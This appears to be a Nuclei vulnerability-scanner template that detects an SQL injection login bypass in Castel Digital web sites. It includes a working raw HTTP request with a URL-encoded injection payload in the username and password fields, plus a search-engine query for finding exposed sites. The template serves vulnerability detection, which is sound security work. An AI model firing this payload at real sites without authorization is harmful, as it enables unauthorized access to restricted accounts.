nuclei-templates/http/vulnerabilities/other/castel-digital-sqli.yaml

43 lines
1.1 KiB
YAML

id: castel-digital-sqli
info:
name: Castel Digital - Authentication Bypass
author: Kazgangap
severity: high
description: |
SQL Injection vulnerability in Castel Digital login forms.
reference:
- https://www.casteldigital.com.br/
- https://cxsecurity.com/issue/WLB-2024050032
metadata:
verified: true
max-request: 2
google-query: "Castel Digital"
tags: sqli,auth-bypass,castel
http:
- raw:
- |
POST /restrito/login/sub/ HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
username=x%27%3D%27x%27or%27x&password=x%27%3D%27x%27or%27x
- |
GET /restrito/ HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body_2
words:
- "Banner"
- "Construtoras"
condition: and
- type: status
status:
- 200
# digest: 4b0a00483046022100d80a22d4cf273f6271529eb7a45f6340388cc7b72da5125e620e24e141c66ac4022100dab34630a0cb5708cd7153359df8c7bbe5b45c9c7ee7cb0f076e31a29b76023d:922c64590222798bb761d5b6d8e72950